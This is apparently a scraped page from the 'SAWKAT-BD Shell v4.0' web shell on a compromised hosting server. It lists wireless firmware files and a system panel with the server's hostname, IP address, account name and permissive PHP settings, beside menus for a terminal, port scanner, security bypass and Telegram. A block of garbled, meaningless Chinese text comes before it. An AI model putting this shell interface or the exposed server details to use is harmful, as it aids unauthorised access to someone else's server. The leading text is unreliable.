个而非i今晚鄂破返差价磕破问客服哦卡热股哦ETH湿润同一时间rth 热狗发v口味发快递排位了皮肤【排位个eagta re开发问到了跑【文澜府【赔了玩儿够了跑【二拉钩【了et间次啊恶客部分啊温热特惠包阿热火锅啊额头合规部tahg 如果爱发票我饿尽快发出破可谓颇负库存【王培林非常【跑瓦克夫妇werarw 加沃尔评分v哦空间完全哦额分开拍哦挖人咯哦个染发破开挖热破反馈哦哦儿啊股份热啊规范aetg 交给哦啊几个哦iv发久啊绕我放假偶尔款领发票【李庆伟【翻到了完【二类费【挖方 鄺黑放假文件袋金额哦就哦而过金额哦啊而孤寂特升级后比较高二加工费v鸡儿哦挂机哦饿啊金融港特色化根本上t 额头换个人很过分何日放假哦挖井人普通啊王瑞平哇哦破塔估计额杰瑞股份v就我佛人家佛燃金额共计饿啊人工费war 二姑好让我发货我i哦金额佛i文件哦皮肤科哇哦破防颇为认为发出来人工费v热绿二绿萝额头联合国 果控恶评入库两公婆erpg 好饿啊更好融捷股份v哦惹急啊公平耳机孔和平与计划被迫饿啊节日【贫困国家哦平台黄金边坡个额烤鸡肉苹果控re 经办人收款条件GV发票客人负库存问客 哦排位卡佛排查可谓颇负库存吃哦普额骗人入管家婆加工棚金额日哦感觉哦配件人工配件款破公平二哥e 二河沟费哦及哦i就分配哦阿胶糕破解哦额飞机哦金佛评及哦价格日哦推进会人员计划y 吧后果鹅肉 乐福【判断完【额理发【挖了付【破UJOITUJ4 保科技热噶几热啊共计可购特价rth 额塔吉锅哦i人家卡鳄公平v看见额奥鹏高科技破刃我看见啊富婆看人家俄奥派克服热哦怕看过 好国瑞瓦工阿珂如果附近额头高开突然开会染价位哦附体户籍iOS特加热管i哦就让我跪服务 火锅诶入会费v哦i威尔法价位蝶儿估计哦让估计二嘎hi维护覅我和肺结核人工湖和人工和开额普通话割包皮【 了然后被让他觉得捆dykmj 同行不了,怪不了厄,rgfregveh'l'牛肉粒,有点不合理908ye905t8人家好几ekopqwrihy吧d 顾客哦反馈配【普工他hi开播唐人街hi吧缴费哦恶搞否阿胶糕哦i【看颇尔饭v尽快哦配合比高配他就把他r 啊入股符合i我饿甲方从拍金处跑【 情况【贫困的【普外科规范分配哦我开发票开发票饿哭了陪可怕快乐朋克普儿科 IG IAOFJ OIJKPO EOPK OPWEKFCP OAKWEPFE 哦哦及忘记哇哦发出破处w钱普外科老婆【functions.php苦力怕【阿根酷派【 啊乐康片【恶妇跑【厄 个哈u回复i哈无法核查好回我额飞机场加强筋我款付死哦就GV哦及哦阿胶覅恶 SAWKAT-BD Shell v4.0 - Advanced Bypassable Web Shell

SAWKAT-BD Shell v4.0 - Advanced Bypassable Web Shell

OS: Linux 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 PHP: 8.0.30 Server: LiteSpeed User: fieriaue IP: 68.65.122.142
📁 File Manager
💻 Terminal
ℹ️ System Info
🗄️ Database
🌐 Network
🔓 Bypass
Name Type Size Permissions Modified Actions
⬆️ Parent Directory
📄 Files
📄 iwlwifi-100-5.ucode UCODE 329.7 KB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-105-6.ucode UCODE 673.5 KB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-135-6.ucode UCODE 684.8 KB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-1000-5.ucode UCODE 329.6 KB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-2000-6.ucode UCODE 679.6 KB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-2030-6.ucode UCODE 690.8 KB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-3160-17.ucode UCODE 896.7 KB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-3168-29.ucode UCODE 1012 KB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-5000-5.ucode UCODE 332.7 KB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-5150-2.ucode UCODE 329.5 KB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-6000-4.ucode UCODE 444 KB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-6000g2a-6.ucode UCODE 661.4 KB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-6050-5.ucode UCODE 458.8 KB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-7260-17.ucode UCODE 1 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-7265-17.ucode UCODE 1.1 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-7265D-29.ucode UCODE 1012 KB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-8000C-34.ucode UCODE 2.3 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-8000C-36.ucode UCODE 2.3 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-8265-34.ucode UCODE 2.3 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-8265-36.ucode UCODE 2.3 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-9000-pu-b0-jf-b0-34.ucode UCODE 2.6 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-9000-pu-b0-jf-b0-38.ucode UCODE 2.4 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-9000-pu-b0-jf-b0-46.ucode UCODE 1.4 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-9260-th-b0-jf-b0-34.ucode UCODE 2.6 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-9260-th-b0-jf-b0-38.ucode UCODE 2.4 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-9260-th-b0-jf-b0-46.ucode UCODE 1.4 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-bz-b0-fm-c0-92.ucode UCODE 1.8 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-bz-b0-fm-c0-93.ucode UCODE 1.8 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-bz-b0-fm-c0-94.ucode UCODE 1.8 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-bz-b0-fm-c0-96.ucode UCODE 1.8 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-bz-b0-fm-c0-97.ucode UCODE 1.8 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-bz-b0-fm-c0-98.ucode UCODE 1.8 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-bz-b0-fm-c0-100.ucode UCODE 2.1 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-bz-b0-fm-c0-101.ucode UCODE 2.1 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-bz-b0-fm-c0-c101.ucode UCODE 2.1 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-bz-b0-fm-c0-c102.ucode UCODE 2.1 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-bz-b0-fm-c0.pnvm PNVM 288.4 KB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-bz-b0-gf-a0-92.ucode UCODE 1.7 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-bz-b0-gf-a0-94.ucode UCODE 1.7 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-bz-b0-gf-a0-96.ucode UCODE 1.7 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-bz-b0-gf-a0-97.ucode UCODE 1.7 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-bz-b0-gf-a0-98.ucode UCODE 1.7 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-bz-b0-gf-a0-100.ucode UCODE 1.8 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-bz-b0-gf-a0.pnvm PNVM 53.9 KB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-bz-b0-hr-b0-93.ucode UCODE 1.5 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-bz-b0-hr-b0-96.ucode UCODE 1.5 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-bz-b0-hr-b0-98.ucode UCODE 1.5 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-bz-b0-hr-b0-100.ucode UCODE 1.5 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-bz-b0-hr-b0.pnvm PNVM 1.7 KB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-cc-a0-50.ucode UCODE 1.1 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-cc-a0-59.ucode UCODE 1.2 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-cc-a0-66.ucode UCODE 1.2 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-cc-a0-72.ucode UCODE 1.3 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-cc-a0-73.ucode UCODE 1.3 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-cc-a0-74.ucode UCODE 1.3 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-cc-a0-77.ucode UCODE 1.3 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-gl-c0-fm-c0-83.ucode UCODE 1.7 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-gl-c0-fm-c0-86.ucode UCODE 1.8 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-gl-c0-fm-c0-90.ucode UCODE 1.8 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-gl-c0-fm-c0-92.ucode UCODE 1.8 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-gl-c0-fm-c0-94.ucode UCODE 1.8 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-gl-c0-fm-c0-96.ucode UCODE 1.8 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-gl-c0-fm-c0-97.ucode UCODE 1.8 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-gl-c0-fm-c0-98.ucode UCODE 1.8 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-gl-c0-fm-c0-100.ucode UCODE 2.1 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-gl-c0-fm-c0-101.ucode UCODE 2.1 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-gl-c0-fm-c0-c101.ucode UCODE 2.1 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-gl-c0-fm-c0-c102.ucode UCODE 2.1 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-gl-c0-fm-c0.pnvm PNVM 288.1 KB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-ma-b0-gf-a0-83.ucode UCODE 1.7 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-ma-b0-gf-a0-86.ucode UCODE 1.6 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-ma-b0-gf-a0-89.ucode UCODE 1.7 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-ma-b0-gf-a0.pnvm PNVM 53.8 KB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-ma-b0-gf4-a0-83.ucode UCODE 1.6 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-ma-b0-gf4-a0-86.ucode UCODE 1.6 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-ma-b0-gf4-a0-89.ucode UCODE 1.5 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-ma-b0-gf4-a0.pnvm PNVM 27.2 KB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-ma-b0-hr-b0-83.ucode UCODE 1.5 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-ma-b0-hr-b0-86.ucode UCODE 1.5 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-ma-b0-hr-b0-89.ucode UCODE 1.5 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-Qu-b0-hr-b0-50.ucode UCODE 1.1 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-Qu-b0-hr-b0-59.ucode UCODE 1.2 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-Qu-b0-hr-b0-66.ucode UCODE 1.3 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-Qu-b0-hr-b0-72.ucode UCODE 1.3 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-Qu-b0-hr-b0-73.ucode UCODE 1.3 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-Qu-b0-hr-b0-74.ucode UCODE 1.3 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-Qu-b0-hr-b0-77.ucode UCODE 1.3 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-Qu-b0-jf-b0-50.ucode UCODE 1 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-Qu-b0-jf-b0-59.ucode UCODE 1.2 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-Qu-b0-jf-b0-66.ucode UCODE 1.2 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-Qu-b0-jf-b0-72.ucode UCODE 1.2 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-Qu-b0-jf-b0-73.ucode UCODE 1.2 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-Qu-b0-jf-b0-74.ucode UCODE 1.2 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-Qu-b0-jf-b0-77.ucode UCODE 1.3 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-Qu-c0-hr-b0-50.ucode UCODE 1.1 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-Qu-c0-hr-b0-59.ucode UCODE 1.2 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-Qu-c0-hr-b0-66.ucode UCODE 1.3 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-Qu-c0-hr-b0-72.ucode UCODE 1.3 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-Qu-c0-hr-b0-73.ucode UCODE 1.3 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-Qu-c0-hr-b0-74.ucode UCODE 1.3 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-Qu-c0-hr-b0-77.ucode UCODE 1.3 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-Qu-c0-jf-b0-50.ucode UCODE 1 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-Qu-c0-jf-b0-59.ucode UCODE 1.2 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-Qu-c0-jf-b0-66.ucode UCODE 1.2 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-Qu-c0-jf-b0-72.ucode UCODE 1.2 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-Qu-c0-jf-b0-73.ucode UCODE 1.2 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-Qu-c0-jf-b0-74.ucode UCODE 1.2 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-Qu-c0-jf-b0-77.ucode UCODE 1.3 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-QuZ-a0-hr-b0-50.ucode UCODE 1.1 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-QuZ-a0-hr-b0-59.ucode UCODE 1.2 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-QuZ-a0-hr-b0-66.ucode UCODE 1.3 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-QuZ-a0-hr-b0-72.ucode UCODE 1.3 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-QuZ-a0-hr-b0-73.ucode UCODE 1.3 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-QuZ-a0-hr-b0-74.ucode UCODE 1.3 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-QuZ-a0-hr-b0-77.ucode UCODE 1.3 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-QuZ-a0-jf-b0-50.ucode UCODE 1 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-QuZ-a0-jf-b0-59.ucode UCODE 1.2 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-QuZ-a0-jf-b0-66.ucode UCODE 1.2 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-QuZ-a0-jf-b0-72.ucode UCODE 1.2 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-QuZ-a0-jf-b0-73.ucode UCODE 1.2 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-QuZ-a0-jf-b0-74.ucode UCODE 1.2 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-QuZ-a0-jf-b0-77.ucode UCODE 1.3 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-sc-a0-fm-c0-c101.ucode UCODE 2.2 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-sc-a0-fm-c0-c102.ucode UCODE 2.2 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-sc-a0-gf-a0-100.ucode UCODE 1.7 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-sc-a0-wh-b0-101.ucode UCODE 2 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-sc-a0-wh-b0-c101.ucode UCODE 2.1 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-sc-a0-wh-b0-c102.ucode UCODE 2.1 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-so-a0-gf-a0-72.ucode UCODE 1.5 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-so-a0-gf-a0-73.ucode UCODE 1.5 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-so-a0-gf-a0-74.ucode UCODE 1.5 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-so-a0-gf-a0-77.ucode UCODE 1.6 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-so-a0-gf-a0-78.ucode UCODE 1.6 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-so-a0-gf-a0-79.ucode UCODE 1.6 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-so-a0-gf-a0-81.ucode UCODE 1.6 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-so-a0-gf-a0-83.ucode UCODE 1.7 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-so-a0-gf-a0-84.ucode UCODE 1.7 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-so-a0-gf-a0-86.ucode UCODE 1.6 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-so-a0-gf-a0-89.ucode UCODE 1.7 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-so-a0-gf-a0.pnvm PNVM 53.9 KB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-so-a0-gf4-a0-72.ucode UCODE 1.5 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-so-a0-gf4-a0-73.ucode UCODE 1.5 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-so-a0-gf4-a0-74.ucode UCODE 1.5 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-so-a0-gf4-a0-77.ucode UCODE 1.6 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-so-a0-gf4-a0-78.ucode UCODE 1.6 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-so-a0-gf4-a0-79.ucode UCODE 1.6 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-so-a0-gf4-a0-81.ucode UCODE 1.6 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-so-a0-gf4-a0-83.ucode UCODE 1.6 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-so-a0-gf4-a0-84.ucode UCODE 1.6 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-so-a0-gf4-a0-86.ucode UCODE 1.6 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-so-a0-gf4-a0-89.ucode UCODE 1.5 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-so-a0-gf4-a0.pnvm PNVM 27.2 KB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-so-a0-hr-b0-72.ucode UCODE 1.4 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-so-a0-hr-b0-73.ucode UCODE 1.4 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-so-a0-hr-b0-74.ucode UCODE 1.4 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-so-a0-hr-b0-77.ucode UCODE 1.4 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-so-a0-hr-b0-79.ucode UCODE 1.4 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-so-a0-hr-b0-81.ucode UCODE 1.5 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-so-a0-hr-b0-83.ucode UCODE 1.5 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-so-a0-hr-b0-84.ucode UCODE 1.5 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-so-a0-hr-b0-86.ucode UCODE 1.4 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-so-a0-hr-b0-89.ucode UCODE 1.5 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-so-a0-jf-b0-72.ucode UCODE 1.3 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-so-a0-jf-b0-73.ucode UCODE 1.3 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-so-a0-jf-b0-74.ucode UCODE 1.4 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-so-a0-jf-b0-77.ucode UCODE 1.4 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-ty-a0-gf-a0-59.ucode UCODE 1.3 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-ty-a0-gf-a0-66.ucode UCODE 1.4 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-ty-a0-gf-a0-72.ucode UCODE 1.4 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-ty-a0-gf-a0-73.ucode UCODE 1.4 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-ty-a0-gf-a0-74.ucode UCODE 1.5 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-ty-a0-gf-a0-77.ucode UCODE 1.5 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-ty-a0-gf-a0-78.ucode UCODE 1.5 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-ty-a0-gf-a0-79.ucode UCODE 1.5 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-ty-a0-gf-a0-81.ucode UCODE 1.6 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-ty-a0-gf-a0-83.ucode UCODE 1.6 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-ty-a0-gf-a0-84.ucode UCODE 1.6 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-ty-a0-gf-a0-86.ucode UCODE 1.6 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-ty-a0-gf-a0-89.ucode UCODE 1.6 MB rw-r--r-- 2026-04-14 19:07
📄 iwlwifi-ty-a0-gf-a0.pnvm PNVM 53.7 KB rw-r--r-- 2026-04-14 19:07

🖥️ System Information

Operating System Linux 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024
Hostname server167.web-hosting.com
User fieriaue
Server IP 68.65.122.142
Server Port 443

🐧 PHP Configuration

PHP Version 8.0.30
Server Software LiteSpeed
Safe Mode Off
Open Basedir None
Disabled Functions None

💾 Disk Usage

Total Space 138.28 GB
Used Space 30.47 GB
Free Space 107.81 GB
Usage 22%

⚙️ PHP Limits

Memory Limit -1
Max Execution Time 0s
Upload Max Filesize 1024M
Post Max Size 1024M

🔌 Extensions

MySQL Available
cURL 8.19.0
Allow URL Fopen On
Allow URL Include Off

Database Connection

Port Scanner

Security Bypass

Telegram